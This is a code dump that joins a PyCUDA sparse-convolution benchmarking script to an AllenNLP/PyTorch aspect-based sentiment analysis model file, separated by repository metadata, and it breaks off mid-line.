data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse(data_d, offset_d, reorder_d, index_d, stride_d, weight_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() time_computation_end.synchronize() # time_computation_end = time.time() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() # time_mem_transfer_end = time.time() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 # time_without_mem = time_computation_end - time_computation_start # time_include_mem = time_mem_transfer_end - time_mem_transfer_start return out, time_without_mem, time_include_mem def conv_sparse_shared_mem(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d = cuda.mem_alloc(weight.nbytes) ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse_shared = self.mod.get_function("sparse_conv_shared") cuda.memcpy_htod(data_d, data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse_shared(data_d, offset_d, reorder_d, index_d, stride_d, weight_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() time_computation_end.synchronize() # time_computation_end = time.time() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() # time_mem_transfer_end = time.time() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 # time_without_mem = time_computation_end - time_computation_start # time_include_mem = time_mem_transfer_end - time_mem_transfer_start return out, time_without_mem, time_include_mem def conv_sparse_shared_constant_mem(self, data, offset, reorder, index, stride, weight, ptset, step, out): BN, IC, IH, IW = data.shape _, OC, OH, OW = out.shape mask_width = 3 pattern_set_size = ptset.shape[0] nonzero_per_kernel = ptset.shape[1] block_width = 4 block_dim = (block_width, block_width, block_width) grid_dim = ((OC - 1) // block_width + 1, (OH - 1) // block_width + 1, (OW - 1) // block_width + 1) time_computation_start = cuda.Event() time_computation_end = cuda.Event() time_mem_transfer_start = cuda.Event() time_mem_transfer_end = cuda.Event() time_mem_transfer_start.record() data_d = cuda.mem_alloc(data.nbytes) offset_d = cuda.mem_alloc(offset.nbytes) reorder_d = cuda.mem_alloc(reorder.nbytes) index_d = cuda.mem_alloc(index.nbytes) stride_d = cuda.mem_alloc(stride.nbytes) weight_d, _ = self.mod.get_global('Weight') ptset_d = cuda.mem_alloc(ptset.nbytes) out_d = cuda.mem_alloc(out.nbytes) do_conv_sparse_shared_constant = self.mod.get_function("sparse_conv_shared_constant") cuda.memcpy_htod(data_d, data) cuda.memcpy_htod(offset_d, offset) cuda.memcpy_htod(reorder_d, reorder) cuda.memcpy_htod(index_d, index) cuda.memcpy_htod(stride_d, stride) cuda.memcpy_htod(weight_d, weight) cuda.memcpy_htod(ptset_d, ptset) time_computation_start.record() for bn in range(BN): do_conv_sparse_shared_constant(data_d, offset_d, reorder_d, index_d, stride_d, ptset_d, out_d, np.int32(bn), np.int32(IC), np.int32(IH), np.int32(IW), np.int32(OC), np.int32(OH), np.int32(OW), np.int32(pattern_set_size), np.int32(nonzero_per_kernel), np.int32(mask_width), np.int32(step), block=block_dim, grid=grid_dim) time_computation_end.record() time_computation_end.synchronize() cuda.memcpy_dtoh(out, out_d) time_mem_transfer_end.record() time_mem_transfer_end.synchronize() time_without_mem = time_computation_start.time_till(time_computation_end)*1e-3 time_include_mem = time_mem_transfer_start.time_till(time_mem_transfer_end)*1e-3 return out, time_without_mem, time_include_mem def conv_nnpack(): conv = Convolution() cuda0 = torch.device('cuda:0') cpu = torch.device('cpu') total_time = 0 for idx in tqdm(range(len(residual_convs[:]))): input_data = np.ones(data_shapes[idx]).astype(np.float32) conv_mask = residual_convs[idx].astype(np.float32) input_data_g = torch.tensor(input_data, device=cuda0) conv_mask_g = torch.tensor(conv_mask, device=cuda0) start = time.time() output_gt = nn.functional.conv2d(input_data_g, conv_mask_g, padding=1) # output_gt = nn.functional.conv2d(torch.tensor(input_data), torch.tensor(conv_mask),padding=1) end = time.time() total_time += end - start print("nnpack") print(f'{round(total_time, 3)}s') def conv_naive(): conv = Convolution() cuda0 = torch.device('cuda:0') total_time = 0 for idx in tqdm(range(len(residual_convs[:]))): input_data = np.ones(data_shapes[idx]).astype(np.float32) conv_mask = residual_convs[idx].astype(np.float32) output_1, time_ = conv.conv_multiple_filters(input_data, conv_mask) total_time += time_ #print(f'{round(total_time,3)}s') print("naive") print(f'{round(total_time,3)}s') # if __name__ == "__main__": # conv = SparseConvolution() # # path = 'resnet34_6_pattern_connectivity_pruning.pt' # state_dict = torch.load(path, map_location=torch.device('cpu')) # # residual_convs = [v.cpu().numpy() for (k, v) in state_dict.items() if "layer" in k and "conv" in k] # data_shapes = [ # [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], [1, 64, 32, 32], # [1, 64, 32, 32], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], # [1, 128, 16, 16], [1, 128, 16, 16], [1, 128, 16, 16], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], # [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], # [1, 256, 8, 8], [1, 256, 8, 8], [1, 256, 8, 8], [1, 512, 4, 4], [1, 512, 4, 4], [1, 512, 4, 4], # [1, 512, 4, 4], [1, 512, 4, 4], # ] # # time_without_mem_list_naive = [] # time_include_mem_list_naive = [] # time_without_mem_list_shared = [] # time_include_mem_list_shared = [] # time_without_mem_list_constant = [] # time_include_mem_list_constant = [] # time_list_pytorch = [] # # for i in range(len(residual_convs)): # print("layer" + str(i)) # input_data = np.float32(np.ones(data_shapes[i])) # # output_data = np.float32(np.zeros(data_shapes[i + 1])) # # conv_layer_weight = residual_convs[i].astype(np.float32) # patterns = np.array(extract_patterns(conv_layer_weight)) # sparse_conv_arrays = SparseConvArrays(conv_layer_weight, patterns) # offset = sparse_conv_arrays.offset # reorder = sparse_conv_arrays.reorder # index = sparse_conv_arrays.index # stride = sparse_conv_arrays.stride # sparse_weight = sparse_conv_arrays.weight # ptset = np.float32(sparse_conv_arrays.ptset) # # # step 卷积步长 # step = int(data_shapes[i][2] / data_shapes[i + 1][2]) # output_naive, time_without_mem_naive, time_include_mem_naive = conv.conv_sparse_naive(input_data, offset, reorder, index, stride, sparse_weight, ptset, step, output_data) # output_shared, time_without_mem_shared, time_include_mem_shared = conv.conv_sparse_shared_mem(input_data, offset, reorder, index, stride, sparse_weight, ptset, step, output_data) # # time_without_mem_list_naive.append(time_without_mem_naive) # time_include_mem_list_naive.append(time_include_mem_naive) # time_without_mem_list_shared.append(time_without_mem_shared) # time_include_mem_list_shared.append(time_include_mem_shared) # # #constant memory limit # if sparse_weight.shape[0] <= 16384: # output_constant, time_without_mem_constant, time_include_mem_constant = conv.conv_sparse_shared_constant_mem(input_data, offset, reorder, index, stride, sparse_weight, ptset, step, output_data) # time_without_mem_list_constant.append(time_without_mem_constant) # time_include_mem_list_constant.append(time_include_mem_constant) # # pytorch_start = time.time() # output_gt = nn.functional.conv2d(torch.tensor(input_data), torch.tensor(conv_layer_weight), padding=1, stride=step) # pytorch_end = time.time() # # pytorch_time = pytorch_end - pytorch_start # time_list_pytorch.append(pytorch_time) # # output_gt = output_gt.cpu().numpy() # # print(np.allclose(output_naive, output_gt)) # # print(np.allclose(output_shared, output_gt)) # # #constant memory limit # # if sparse_weight.shape[0] <= 16384: # # print(np.allclose(output_constant, output_gt)) # # #break when it comes to last layer # if i == len(residual_convs) - 2: # break # # print("Pytorch Conv2d time") # print(np.sum(time_list_pytorch)) # print("Sparse Naive without memory transfer") # print(np.sum(time_without_mem_list_naive)) # print("parse Naive include memory transfer") # print(np.sum(time_include_mem_list_naive)) # print("Sparse Shared memory without memory transfer") # print(np.sum(time_without_mem_list_shared)) # print("Sparse Shared memory include memory transfer") # print(np.sum(time_include_mem_list_shared)) # print("Sparse Shared and Constant memory without memory transfer") # print(time_without_mem_list_constant) # print("Sparse Shared and Constant memory include memory transfer") # print(time_include_mem_list_constant) # # conv_naive() # conv_nnpack()
43.121905
209
0.566809
2,915
22,639
4.110806
0.074443
0.019277
0.033798
0.024952
0.812401
0.785446
0.760828
0.726446
0.722106
0.714763
0
0.030454
0.325544
22,639
524
210
43.204198
0.754339
0.224568
0
0.731959
0
0.058419
0.460336
0.026107
0
0
0
0
0
1
0.024055
false
0.003436
0.037801
0
0.079038
0.013746
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
81e16c14f8ddfae1860d7da80bbef6084be49d06
104,578
py
Python
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
21
2020-12-12T01:54:56.000Z
2021-12-14T12:26:51.000Z
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
1
2021-09-27T03:07:22.000Z
2021-09-28T08:22:59.000Z
nlp_tasks/absa/aspect_category_detection_and_sentiment_classification/pytorch_models.py
l294265421/AC-MIMLLN
f62e71a1d7f3f6a6d2c3ec469570a171db4300a4
[ "MIT" ]
4
2020-12-30T13:40:37.000Z
2021-12-05T09:30:50.000Z
# -*- coding: utf-8 -*- from typing import * from overrides import overrides import time import copy import os import re import numpy as np import torch import torch.nn as nn import torch.optim as optim from allennlp.modules.seq2vec_encoders import CnnEncoder as VectorCnnEncoder from allennlp.nn.util import get_text_field_mask from allennlp.models import Model from allennlp.modules.text_field_embedders import TextFieldEmbedder from allennlp.data.fields import TextField, MetadataField, ArrayField, LabelField from allennlp.data.token_indexers import SingleIdTokenIndexer from allennlp.data.token_indexers import TokenIndexer from allennlp.data import Instance from allennlp.data.token_indexers import TokenIndexer from allennlp.data.tokenizers import Token from allennlp.nn import util as nn_util from allennlp.data.vocabulary import Vocabulary from allennlp.data.dataset_readers import DatasetReader import torch.nn.functional as F from allennlp.training import metrics from allennlp.models import BasicClassifier from allennlp.modules import attention from allennlp.data.iterators import DataIterator from tqdm import tqdm from scipy.special import expit from allennlp.nn import util as allennlp_util import dgl from dgl import function as dgl_fn from sklearn.metrics import f1_score, precision_score, recall_score from nlp_tasks.utils import attention_visualizer from nlp_tasks.absa.aspect_category_detection_and_sentiment_classification import allennlp_metrics from nlp_tasks.absa.aspect_category_detection_and_sentiment_classification.cnn_encoder_seq2seq import CnnEncoder class AttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True, softmax=True): super().__init__() self.W = nn.Linear(in_features, out_features, bias) self.uw = nn.Linear(out_features, 1, bias=False) self.softmax = softmax def forward(self, h: torch.Tensor, mask: torch.Tensor): u = self.W(h) u = torch.tanh(u) similarities = self.uw(u) similarities = similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class DotProductAttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True, softmax=True): super().__init__() self.uw = nn.Linear(in_features, 1, bias=False) self.softmax = softmax def forward(self, h: torch.Tensor, mask: torch.Tensor): similarities = self.uw(h) similarities = similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class AverageAttention(nn.Module): """ 2019-emnlp-Attention is not not Explanation """ def __init__(self): super().__init__() def forward(self, h: torch.Tensor, mask: torch.Tensor): alpha = allennlp_util.masked_softmax(mask, mask) return alpha class BernoulliAttentionInHtt(nn.Module): """ 2016-Hierarchical Attention Networks for Document Classification """ def __init__(self, in_features, out_features, bias=True): super().__init__() self.W = nn.Linear(in_features, out_features, bias) self.uw = nn.Linear(out_features, 1, bias=False) def forward(self, h: torch.Tensor, mask: torch.Tensor): u = self.W(h) u = torch.tanh(u) similarities = self.uw(u) similarities = similarities.squeeze(dim=-1) alpha = torch.sigmoid(similarities) return alpha class AttentionInCan(nn.Module): """ 2019-emnlp-CAN Constrained Attention Networks for Multi-Aspect Sentiment Analysis """ def __init__(self, in_features, bias=True, softmax=True): super().__init__() self.W1 = nn.Linear(in_features, in_features, bias) self.W2 = nn.Linear(in_features, in_features, bias) self.uw = nn.Linear(in_features, 1, bias=False) self.softmax = softmax def forward(self, h1: torch.Tensor, h2: torch.Tensor, mask: torch.Tensor): u1 = self.W1(h1) u2 = self.W2(h2) u = u1 + u2 u = torch.tanh(u) similarities = self.uw(u) similarities = similarities.squeeze(dim=-1) if self.softmax: alpha = allennlp_util.masked_softmax(similarities, mask) return alpha else: return similarities class LocationMaskLayer(nn.Module): """ 2017-CIKM-Aspect-level Sentiment Classification with HEAT (HiErarchical ATtention) Network """ def __init__(self, location_num, configuration): super().__init__() self.location_num = location_num self.configuration = configuration def forward(self, alpha: torch.Tensor): location_num = self.location_num location_matrix = torch.zeros([location_num, location_num], dtype=torch.float, device=self.configuration['device'], requires_grad=False) for i in range(location_num): for j in range(location_num): location_matrix[i, j] = 1 - (abs(i - j) / location_num) result = alpha.mm(location_matrix) return result class TextInAllAspectSentimentOutModel(Model): def __init__(self, vocab: Vocabulary, category_loss_weight=1, sentiment_loss_weight=1): super().__init__(vocab) self.category_loss_weight = category_loss_weight self.sentiment_loss_weight = sentiment_loss_weight def matrix_mul(self, input, weight, bias=False): feature_list = [] for feature in input: feature = torch.mm(feature, weight) if isinstance(bias, torch.nn.parameter.Parameter): feature = feature + bias.expand(feature.size()[0], bias.size()[1]) feature = torch.tanh(feature).unsqueeze(0) feature_list.append(feature) return torch.cat(feature_list, 0).squeeze() def element_wise_mul(self, input1, input2, return_not_sum_result=False): feature_list = [] for feature_1, feature_2 in zip(input1, input2): feature_2 = feature_2.unsqueeze(1) feature_2 = feature_2.expand_as(feature_1) feature = feature_1 * feature_2 feature = feature.unsqueeze(0) feature_list.append(feature) output = torch.cat(feature_list, 0) result = torch.sum(output, 1) if return_not_sum_result: return result, output else: return result def reduce(self, nodes): """Take an average over all neighbor node features hu and use it to overwrite the original node feature.""" m = nodes.mailbox['m'] accum = torch.sum(m, 1) return {'h': accum} def pad_dgl_graph(self, graphs, max_node_num): graphs_padded = [] for graph in graphs: graph_padded = copy.deepcopy(graph) node_num = graph.number_of_nodes() graph_padded.add_nodes(max_node_num - node_num) graphs_padded.append(graph_padded) return graphs_padded def no_grad_for_acd_parameter(self): self.set_grad_for_acd_parameter(requires_grad=False) def set_grad_for_acd_parameter(self, requires_grad=True): pass def set_grad_for_acsc_parameter(self, requires_grad=True): pass def _get_model_visualization_picture_filepath(self, configuration: dict, words: list): savefig_dir = configuration['savefig_dir'] if not savefig_dir: return None filename = '%s-%s.svg' % ('-'.join(words[:3]), str(time.time())) filename = re.sub('/', '', filename) return os.path.join(savefig_dir, filename) class AsMilSimultaneouslyV5(TextInAllAspectSentimentOutModel): def __init__(self, word_embedder: TextFieldEmbedder, position_embedder: TextFieldEmbedder, aspect_embedder: TextFieldEmbedder, categories: list, polarities: list, vocab: Vocabulary, configuration: dict, category_loss_weight=1, sentiment_loss_weight=1): super().__init__(vocab, category_loss_weight=category_loss_weight, sentiment_loss_weight=sentiment_loss_weight) self.configuration = configuration self.word_embedder = word_embedder self.position_embedder = position_embedder self.aspect_embedder = aspect_embedder self.categories = categories self.polarites = polarities self.category_num = len(categories) self.polarity_num = len(polarities) self.category_loss = nn.BCEWithLogitsLoss() self.sentiment_loss = nn.CrossEntropyLoss() self._accuracy = metrics.CategoricalAccuracy() self._f1 = allennlp_metrics.BinaryF1(0.5) word_embedding_dim = word_embedder.get_output_dim() if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': self.embedding_layer_fc = nn.Linear(word_embedding_dim, word_embedding_dim, bias=True) elif self.configuration['lstm_or_fc_after_embedding_layer'] == 'bilstm': self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=1) else: self.embedding_layer_lstm = torch.nn.LSTM(word_embedding_dim, word_embedding_dim, batch_first=True, bidirectional=False, num_layers=1) self.embedding_layer_aspect_attentions = [AttentionInHtt(word_embedding_dim, word_embedding_dim) for _ in range(self.category_num)] self.embedding_layer_aspect_attentions = nn.ModuleList(self.embedding_layer_aspect_attentions) lstm_input_size = word_embedding_dim if self.configuration['position']: lstm_input_size += position_embedder.get_output_dim() if self.configuration['sentence_encoder_for_sentiment'] == 'cnn': ngram_filter_sizes = (2, 3, 4) self.cnn_encoder = CnnEncoder(lstm_input_size, int(word_embedding_dim / len(ngram_filter_sizes)), ngram_filter_sizes=ngram_filter_sizes) else: num_layers = self.configuration['lstm_layer_num_in_lstm'] self.lstm = torch.nn.LSTM(lstm_input_size, int(word_embedding_dim / 2), batch_first=True, bidirectional=True, num_layers=num_layers, dropout=0.5) self.category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.category_fcs = nn.ModuleList(self.category_fcs) if self.configuration['lstm_layer_category_classifier']: self.lstm_category_fcs = [nn.Linear(word_embedding_dim, 1) for _ in range(self.category_num)] self.lstm_category_fcs = nn.ModuleList(self.lstm_category_fcs) sentiment_fc_input_size = word_embedding_dim if not self.configuration['share_sentiment_classifier']: self.sentiment_fcs = [nn.Sequential(nn.Linear(sentiment_fc_input_size, sentiment_fc_input_size), nn.ReLU(), nn.Linear(sentiment_fc_input_size, self.polarity_num)) for _ in range(self.category_num)] self.sentiment_fcs = nn.ModuleList(self.sentiment_fcs) else: self.sentiment_fc = nn.Sequential(nn.Linear(sentiment_fc_input_size, sentiment_fc_input_size), nn.ReLU(), nn.Linear(sentiment_fc_input_size, self.polarity_num)) self.dropout_after_embedding_layer = nn.Dropout(0.5) self.dropout_after_lstm_layer = nn.Dropout(0.5) # self.gc1 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) # self.gc2 = DglGraphConvolution(word_embedding_dim, word_embedding_dim, configuration) def set_grad_for_acd_parameter(self, requires_grad=True): acd_layers = [] if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': acd_layers.append(self.embedding_layer_fc) else: acd_layers.append(self.embedding_layer_lstm) acd_layers.append(self.embedding_layer_aspect_attentions) acd_layers.append(self.category_fcs) for layer in acd_layers: for name, value in layer.named_parameters(): value.requires_grad = requires_grad def forward(self, tokens: Dict[str, torch.Tensor], label: torch.Tensor, position: torch.Tensor, polarity_mask: torch.Tensor, sample: list, aspects: torch.Tensor=None) -> torch.Tensor: mask = get_text_field_mask(tokens) word_embeddings = self.word_embedder(tokens) if self.configuration['lstm_or_fc_after_embedding_layer'] == 'fc': word_embeddings_fc = self.embedding_layer_fc(word_embeddings) elif self.configuration['lstm_or_fc_after_embedding_layer'] == 'gcn': max_len = tokens['tokens'].size()[1] graphs = [e[3] for e in sample] graphs_padded = self.pad_dgl_graph(graphs, max_len) word_embeddings_fc = F.relu(self.gc_aspect_category(word_embeddings, graphs_padded)) else: word_embeddings_fc, (_, _) = self.embedding_layer_lstm(word_embeddings) aspects_separate = [{'aspect': aspects['aspect'][:, i].unsqueeze(1)} for i in range(self.category_num)] aspect_embeddings_singles = [self.aspect_embedder(aspects_separate[i]).squeeze(1) for i in range(self.category_num)] aspects_seprate_repeat = [{'aspect': aspects_separate[i]['aspect'].expand_as(tokens['tokens'])} for i in range(self.category_num)] aspect_embeddings_separate = [self.aspect_embedder(aspects_seprate_repeat[i]) for i in range(self.category_num)] embedding_layer_category_outputs = [] embedding_layer_category_alphas = [] embedding_layer_sentiment_outputs = [] embedding_layer_sentiment_alphas = [] embedding_layer_category_alphas = [] for i in range(self.category_num): embedding_layer_aspect_attention = self.embedding_layer_aspect_attentions[i] alpha = embedding_layer_aspect_attention(word_embeddings_fc, mask) embedding_layer_category_alphas.append(alpha) for i in range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(word_embeddings_fc, alpha, return_not_sum_result=False) embedding_layer_category_outputs.append(category_output) lstm_input = word_embeddings if self.configuration['position']: position_embeddings = self.position_embedder(position) lstm_input = torch.cat([word_embeddings, position_embeddings], dim=-1) lstm_input = self.dropout_after_embedding_layer(lstm_input) if self.configuration['sentence_encoder_for_sentiment'] == 'cnn': lstm_result = self.cnn_encoder(lstm_input, mask) else: lstm_result, _ = self.lstm(lstm_input) lstm_result = self.dropout_after_lstm_layer(lstm_result) # lstm_result_with_position = torch.cat([lstm_result, position_embeddings], dim=-1) lstm_layer_category_outputs = [] lstm_layer_sentiment_outputs = [] lstm_layer_words_sentiment_soft = [] # max_len = tokens['tokens'].size()[1] # graphs = [e[3] for e in sample] # graphs_padded = self.pad_dgl_graph(graphs, max_len) # graph_output1 = F.relu(self.gc1(word_embeddings, graphs_padded)) # graph_output2 = F.relu(self.gc2(graph_output1, graphs_padded)) for i in range(self.category_num): alpha = embedding_layer_category_alphas[i] category_output = self.element_wise_mul(lstm_result, alpha, return_not_sum_result=False) lstm_layer_category_outputs.append(category_output) # sentiment # word_representation_for_sentiment = torch.cat([graph_output2, lstm_result], dim=-1) word_representation_for_sentiment = lstm_result sentiment_alpha = embedding_layer_category_alphas[i] if self.configuration['mil']: sentiment_alpha = sentiment_alpha.unsqueeze(1) if not self.configuration['share_sentiment_classifier']: words_sentiment = self.sentiment_fcs[i](word_representation_for_sentiment) else: words_sentiment = self.sentiment_fc(word_representation_for_sentiment) if self.configuration['mil_softmax']: words_sentiment_soft = torch.softmax(words_sentiment, dim=-1) lstm_layer_words_sentiment_soft.append(words_sentiment_soft) else: words_sentiment_soft = words_sentiment lstm_layer_words_sentiment_soft.append(torch.softmax(words_sentiment, dim=-1)) sentiment_output = torch.matmul(sentiment_alpha, words_sentiment_soft).squeeze(1) # batch_size x 2*hidden_dim lstm_layer_sentiment_outputs.append(sentiment_output) else: sentiment_output_temp = self.element_wise_mul(word_representation_for_sentiment, sentiment_alpha, return_not_sum_result=False) if not self.configuration['share_sentiment_classifier']: sentiment_output = self.sentiment_fcs[i](sentiment_output_temp) else: sentiment_output = self.sentiment_fc(sentiment_output_temp) lstm_layer_sentiment_outputs.append(sentiment_output) final_category_outputs = [] final_lstm_category_outputs = [] final_sentiment_outputs = [] for i in range(self.category_num): fc = self.category_fcs[i] category_output = embedding_layer_category_outputs[i] final_category_output = fc(category_output) final_category_outputs.append(final_category_output) if self.configuration['lstm_layer_category_classifier']: fc_lstm = self.lstm_category_fcs[i] lstm_category_output = lstm_layer_category_outputs[i] final_lstm_category_output = fc_lstm(lstm_category_output) final_lstm_category_outputs.append(final_lstm_category_output) final_sentiment_output = lstm_layer_sentiment_outputs[i] final_sentiment_outputs.append(final_sentiment_output) output = {} output['alpha'] = embedding_layer_category_alphas if label is not None: category_labels = [] polarity_labels = [] polarity_masks = [] for i in range(self.category_num): category_labels.append(label[:, i]) polarity_labels.append(label[:, i + self.category_num]) polarity_masks.append(polarity_mask[:, i]) loss = 0 total_category_loss = 0 total_sentiment_loss = 0 for i in range(self.category_num): category_temp_loss = self.category_loss(final_category_outputs[i].squeeze(dim=-1), category_labels[i]) sentiment_temp_loss = self.sentiment_loss(final_sentiment_outputs[i], polarity_labels[i].long()) total_category_loss += category_temp_loss if not self.configuration['only_acd']: total_sentiment_loss += sentiment_temp_loss if self.configuration['lstm_layer_category_classifier']: lstm_category_temp_loss = self.category_loss(final_lstm_category_outputs[i].squeeze(dim=-1), category_labels[i]) total_category_loss += lstm_category_temp_loss loss = self.category_loss_weight * total_category_loss + self.sentiment_loss_weight * total_sentiment_loss # Sparse Regularization Orthogonal Regularization if self.configuration['sparse_reg'] or self.configuration['orthogonal_reg']: reg_loss = 0 for j in range(len(sample)): polarity_mask_of_one_sample = polarity_mask[j] category_alpha_of_one_sample = [embedding_layer_category_alphas[k][j] for k in range(self.category_num)] category_alpha_of_mentioned = [] category_alpha_of_not_mentioned = [] for k in range(self.category_num): if polarity_mask_of_one_sample[k] == 1: category_alpha_of_mentioned.append(category_alpha_of_one_sample[k].unsqueeze(0)) else: category_alpha_of_not_mentioned.append(category_alpha_of_one_sample[k].unsqueeze(0)) if len(category_alpha_of_not_mentioned) != 0: category_alpha_of_not_mentioned = torch.cat(category_alpha_of_not_mentioned, dim=0) category_alpha_of_not_mentioned = torch.mean(category_alpha_of_not_mentioned, dim=0, keepdim=True) category_alpha_of_mentioned.append(category_alpha_of_not_mentioned) category_eye = torch.eye(len(category_alpha_of_mentioned)) category_alpha_of_mentioned = torch.cat(category_alpha_of_mentioned, dim=0) category_alpha_similarity = torch.mm(category_alpha_of_mentioned, category_alpha_of_mentioned.t()) if self.configuration['sparse_reg'] and self.configuration['orthogonal_reg']: pass elif self.configuration['sparse_reg']: for m in range(len(category_alpha_of_mentioned)): for n in range(len(category_alpha_of_mentioned)): if m != n: category_eye[m][n] = category_alpha_similarity[m][n] else: # orthogonal_reg for m in range(len(category_alpha_of_mentioned)): category_eye[m][m] = category_alpha_similarity[m][m] # category_eye = nn_util.move_to_device(category_eye, self.configuration['device']) category_eye = category_eye.to(self.configuration['device']) category_alpha_similarity = category_alpha_similarity.to(self.configuration['device']) category_reg_loss = category_alpha_similarity - category_eye category_reg_loss = torch.norm(category_reg_loss) reg_loss += category_reg_loss loss += (reg_loss * self.configuration['attention_lamda'] / len(sample)) # sentiment accuracy sentiment_logit = torch.cat(final_sentiment_outputs) sentiment_label = torch.cat(polarity_labels) sentiment_mask = torch.cat(polarity_masks) self._accuracy(sentiment_logit, sentiment_label, sentiment_mask) # category f1 final_category_outputs_prob = [torch.sigmoid(e) for e in final_category_outputs] category_prob = torch.cat(final_category_outputs_prob).squeeze() category_label = torch.cat(category_labels) self._f1(category_prob, category_label) output['loss'] = loss # visualize attention pred_category = [torch.sigmoid(e) for e in final_category_outputs] pred_sentiment = [torch.nn.functional.softmax(e, dim=-1) for e in final_sentiment_outputs] output['pred_category'] = pred_category output['pred_sentiment'] = pred_sentiment output['embedding_layer_category_alphas'] = embedding_layer_category_alphas output['lstm_layer_words_sentiment_soft'] = lstm_layer_words_sentiment_soft if self.configuration['visualize_attention']: for i in range(len(sample)): words = sample[i][2] # if not ('while' in words and 'there' in words): # continue attention_labels = [e.split('/')[0] for e in self.categories] label_true = label[i].detach().cpu().numpy()[: self.category_num] if sum(label_true) <= 1: continue # category visual_attentions_category = [embedding_layer_category_alphas[j][i][: len(words)].detach().cpu().numpy() for j in range(self.category_num)] titles = ['true: %s - pred: %s' % (str(label[i][j].detach().cpu().numpy()), str(pred_category[j][i].detach().cpu().numpy())) for j in range(self.category_num)] attention_visualizer.plot_multi_attentions_of_sentence_backup(words, visual_attentions_category, attention_labels, titles) # savefig_filepath = super()._get_model_visualization_picture_filepath(self.configuration, words) # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions_category, # attention_labels, titles, # savefig_filepath=savefig_filepath) # sentiment embedding layer # visual_attentions = [embedding_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer # visual_attentions = [lstm_layer_sentiment_alphas[j][i][: len(words)].detach().cpu().numpy() # for j in range(self.category_num)] # titles = ['true: %s - pred: %s - %s' % (str(label[i + self.category_num][j].detach().cpu().numpy()), # str(pred_sentiment[j][i].detach().cpu().numpy()), # str(self.polarites)) # for j in range(self.category_num)] # attention_visualizer.plot_multi_attentions_of_sentence(words, visual_attentions, attention_labels, # titles) # sentiment lstm layer visual_attentions_sentiment_temp = [lstm_layer_words_sentiment_soft[j][i][: len(words)].detach().cpu().numpy() for j in 